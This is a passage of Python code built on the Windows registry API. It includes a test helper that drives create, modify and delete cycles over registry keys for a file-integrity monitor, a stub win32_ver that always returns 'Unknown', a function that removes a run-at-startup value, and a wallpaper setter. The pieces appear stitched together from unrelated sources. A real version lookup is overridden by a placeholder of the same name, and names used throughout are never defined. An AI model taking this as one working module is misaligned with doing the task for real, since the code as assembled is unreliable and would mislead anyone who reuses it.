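    version = _norm_version(version, build)
    RegCloseKey(keyCurVer)
    return (release, version, csd, ptype)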
def configure_syscheck_environment(time_sleep):
    """Drive a create / modify / delete cycle over test registry keys.

    The sequence gives the file-integrity monitor something to report in each
    phase: the base keys are created and the service restarted, a baseline
    scan is awaited, then a subkey with one value is added to every base key,
    its permissions, owner and value are changed, and finally it is deleted.
    After each phase the clock is moved 13 hours ahead and the function waits
    ``SCAN_WAIT`` seconds for the next scan.

    Args:
        time_sleep: Seconds to pause so that ``generate_windows_yaml.py`` can
            be started by hand.
    """
    def current_user_sid():
        # Account of the user running the test, qualified with the host name.
        return LookupAccountName(
            None, f"{platform.node()}\\{os.getlogin()}")[0]

    def advance_clock_and_wait():
        TimeMachine.travel_to_future(timedelta(hours=13))
        logger.debug(f'Waiting {SCAN_WAIT} seconds for scan to finish.')
        time.sleep(SCAN_WAIT)

    # Create every needed directory
    for index in range(n_windows_registry):
        base_name = f'{testreg}{index}'
        create_registry(registry_parser[KEY], base_name, KEY_WOW64_64KEY)
        reg_list.append(base_name)

    control_service('restart')
    logger.debug('Waiting 15 seconds for syscheckd to start.')
    time.sleep(15)

    reg_key = 'reg_key'
    reg_value = 'value_name'

    logger.debug(
        f'Waiting {str(time_sleep)} seconds. Execute `generate_windows_yaml.py` now.'
    )
    time.sleep(time_sleep)

    # NOTE(review): the message reports SCAN_WAIT but the sleep is a fixed
    # 120 seconds; confirm that the two are meant to be equal.
    logger.debug(f'Waiting {SCAN_WAIT} seconds for baseline scan to finish.')
    time.sleep(120)

    logger.debug('Creating registries...')
    for base_key in reg_list:
        handle = create_registry(registry_parser[KEY],
                                 os.path.join(base_key, reg_key),
                                 KEY_WOW64_64KEY)
        modify_registry_value(handle, reg_value, REG_SZ, 'added')
    advance_clock_and_wait()

    logger.debug('Modifying registries...')
    for base_key in reg_list:
        subkey = os.path.join(base_key, reg_key)
        modify_key_perms(registry_parser[KEY], subkey, KEY_WOW64_64KEY,
                         current_user_sid())
        modify_registry_owner(registry_parser[KEY], subkey, KEY_WOW64_64KEY,
                              current_user_sid())
        handle = RegOpenKeyEx(registry_parser[KEY], subkey, 0,
                              KEY_ALL_ACCESS | KEY_WOW64_64KEY)
        modify_registry_value(handle, reg_value, REG_SZ, 'modified')
    advance_clock_and_wait()

    logger.debug('Deleting registries...')
    for base_key in reg_list:
        delete_registry(registry_parser[KEY],
                        os.path.join(base_key, reg_key), KEY_WOW64_64KEY)
    advance_clock_and_wait()
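def win32_ver(release='', version='', csd='', ptype=''):
    """Return a fixed placeholder instead of probing the Windows version.

    This variant performs no API or registry lookup: the result is always
    ``('Unknown', '', '', '')`` and the arguments are ignored. They are kept
    so that the signature matches the usual ``win32_ver`` interface.

    Returns:
        The tuple ``(release, version, csd, ptype)`` with ``release`` set to
        ``'Unknown'`` and the other fields empty.
    """
    return ('Unknown', '', '', '')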
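def run_at_startup_remove(app_name):
    """Delete the run-at-startup registry value named ``app_name``.

    The value is removed from ``SUBKEY`` under HKEY_LOCAL_MACHINE (``SUBKEY``
    is defined elsewhere in the file). Errors from opening the key or deleting
    the value, including a value that does not exist, are raised to the
    caller.

    Args:
        app_name: Name of the registry value to delete.
    """
    key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, SUBKEY, 0, KEY_WRITE)
    try:
        RegDeleteValue(key, app_name)
    finally:
        # Release the handle even when the delete fails.
        RegCloseKey(key)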
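def set_wall():
    """Apply the bundled ``image/wall.jpg`` as the current user's wallpaper.

    Writes ``WallpaperStyle`` = "2" and ``TileWallpaper`` = "0" under HKCU
    ``Control Panel\\\\Desktop`` and then asks the shell to load the image that
    sits next to this module. Errors are raised to the caller.
    """
    key = RegOpenKeyEx(HKEY_CURRENT_USER, "Control Panel\\Desktop", 0,
                       KEY_SET_VALUE)
    try:
        RegSetValueEx(key, 'WallpaperStyle', 0, REG_SZ, '2')
        RegSetValueEx(key, 'TileWallpaper', 0, REG_SZ, '0')
        # 1+2: presumably SPIF_UPDATEINIFILE | SPIF_SENDCHANGE; confirm against
        # the constants the file imports.
        SystemParametersInfo(SPI_SETDESKWALLPAPER,
                             dirname(__file__)+'/image/wall.jpg', 1+2)
    finally:
        # Release the handle even when a write or the shell call fails.
        RegCloseKey(key)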